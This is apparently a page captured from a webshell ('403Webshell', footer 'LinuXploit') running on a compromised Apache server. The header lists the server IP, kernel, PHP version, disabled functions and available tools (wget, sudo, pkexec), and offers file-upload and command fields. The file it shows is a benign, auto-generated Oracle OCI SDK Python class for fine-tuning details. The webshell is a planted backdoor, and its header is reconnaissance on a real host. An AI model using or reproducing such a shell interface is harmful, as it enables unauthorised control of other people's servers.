403Webshell
Server IP : 103.119.228.120  /  Your IP : 13.58.200.16
Web Server : Apache
System : Linux v8.techscape8.com 3.10.0-1160.119.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Jul 15 12:09:18 UTC 2024 x86_64
User : nobody ( 99)
PHP Version : 5.6.40
Disable Function : shell_exec,symlink,system,exec,proc_get_status,proc_nice,proc_terminate,define_syslog_variables,syslog,openlog,closelog,escapeshellcmd,passthru,ocinum cols,ini_alter,leak,listen,chgrp,apache_note,apache_setenv,debugger_on,debugger_off,ftp_exec,dl,dll,myshellexec,proc_open,socket_bind,proc_close,escapeshellarg,parse_ini_filepopen,fpassthru,exec,passthru,escapeshellarg,escapeshellcmd,proc_close,proc_open,ini_alter,popen,show_source,proc_nice,proc_terminate,proc_get_status,proc_close,pfsockopen,leak,apache_child_terminate,posix_kill,posix_mkfifo,posix_setpgid,posix_setsid,posix_setuid,dl,symlink,shell_exec,system,dl,passthru,escapeshellarg,escapeshellcmd,myshellexec,c99_buff_prepare,c99_sess_put,fpassthru,getdisfunc,fx29exec,fx29exec2,is_windows,disp_freespace,fx29sh_getupdate,fx29_buff_prepare,fx29_sess_put,fx29shexit,fx29fsearch,fx29ftpbrutecheck,fx29sh_tools,fx29sh_about,milw0rm,imagez,sh_name,myshellexec,checkproxyhost,dosyayicek,c99_buff_prepare,c99_sess_put,c99getsource,c99sh_getupdate,c99fsearch,c99shexit,view_perms,posix_getpwuid,posix_getgrgid,posix_kill,parse_perms,parsesort,view_perms_color,set_encoder_input,ls_setcheckboxall,ls_reverse_all,rsg_read,rsg_glob,selfURL,dispsecinfo,unix2DosTime,addFile,system,get_users,view_size,DirFiles,DirFilesWide,DirPrintHTMLHeaders,GetFilesTotal,GetTitles,GetTimeTotal,GetMatchesCount,GetFileMatchesCount,GetResultFiles,fs_copy_dir,fs_copy_obj,fs_move_dir,fs_move_obj,fs_rmdir,SearchText,getmicrotime
MySQL : ON |  cURL : ON |  WGET : ON |  Perl : ON |  Python : ON |  Sudo : ON |  Pkexec : ON
Directory :  /lib/mysqlsh/lib/python3.9/site-packages/oci/generative_ai/models/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /lib/mysqlsh/lib/python3.9/site-packages/oci/generative_ai/models/fine_tune_details.py
# coding: utf-8
# Copyright (c) 2016, 2024, Oracle and/or its affiliates.  All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.

# NOTE: This class is auto generated by OracleSDKGenerator. DO NOT EDIT. API Version: 20231130


from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel  # noqa: F401
from oci.decorators import init_model_state_from_kwargs


@init_model_state_from_kwargs
class FineTuneDetails(object):
    """
    Details about fine-tuning a custom model.
    """

    def __init__(self, **kwargs):
        """
        Initializes a new FineTuneDetails object with values from keyword arguments.
        The following keyword arguments are supported (corresponding to the getters/setters of this class):

        :param training_dataset:
            The value to assign to the training_dataset property of this FineTuneDetails.
        :type training_dataset: oci.generative_ai.models.Dataset

        :param dedicated_ai_cluster_id:
            The value to assign to the dedicated_ai_cluster_id property of this FineTuneDetails.
        :type dedicated_ai_cluster_id: str

        :param training_config:
            The value to assign to the training_config property of this FineTuneDetails.
        :type training_config: oci.generative_ai.models.TrainingConfig

        """
        self.swagger_types = {
            'training_dataset': 'Dataset',
            'dedicated_ai_cluster_id': 'str',
            'training_config': 'TrainingConfig'
        }

        self.attribute_map = {
            'training_dataset': 'trainingDataset',
            'dedicated_ai_cluster_id': 'dedicatedAiClusterId',
            'training_config': 'trainingConfig'
        }

        self._training_dataset = None
        self._dedicated_ai_cluster_id = None
        self._training_config = None

    @property
    def training_dataset(self):
        """
        **[Required]** Gets the training_dataset of this FineTuneDetails.

        :return: The training_dataset of this FineTuneDetails.
        :rtype: oci.generative_ai.models.Dataset
        """
        return self._training_dataset

    @training_dataset.setter
    def training_dataset(self, training_dataset):
        """
        Sets the training_dataset of this FineTuneDetails.

        :param training_dataset: The training_dataset of this FineTuneDetails.
        :type: oci.generative_ai.models.Dataset
        """
        self._training_dataset = training_dataset

    @property
    def dedicated_ai_cluster_id(self):
        """
        **[Required]** Gets the dedicated_ai_cluster_id of this FineTuneDetails.
        The OCID of the dedicated AI cluster this fine-tuning runs on.


        :return: The dedicated_ai_cluster_id of this FineTuneDetails.
        :rtype: str
        """
        return self._dedicated_ai_cluster_id

    @dedicated_ai_cluster_id.setter
    def dedicated_ai_cluster_id(self, dedicated_ai_cluster_id):
        """
        Sets the dedicated_ai_cluster_id of this FineTuneDetails.
        The OCID of the dedicated AI cluster this fine-tuning runs on.


        :param dedicated_ai_cluster_id: The dedicated_ai_cluster_id of this FineTuneDetails.
        :type: str
        """
        self._dedicated_ai_cluster_id = dedicated_ai_cluster_id

    @property
    def training_config(self):
        """
        Gets the training_config of this FineTuneDetails.

        :return: The training_config of this FineTuneDetails.
        :rtype: oci.generative_ai.models.TrainingConfig
        """
        return self._training_config

    @training_config.setter
    def training_config(self, training_config):
        """
        Sets the training_config of this FineTuneDetails.

        :param training_config: The training_config of this FineTuneDetails.
        :type: oci.generative_ai.models.TrainingConfig
        """
        self._training_config = training_config

    def __repr__(self):
        return formatted_flat_dict(self)

    def __eq__(self, other):
        if other is None:
            return False

        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not self == other

Youez - 2016 - github.com/yon3zu
LinuXploit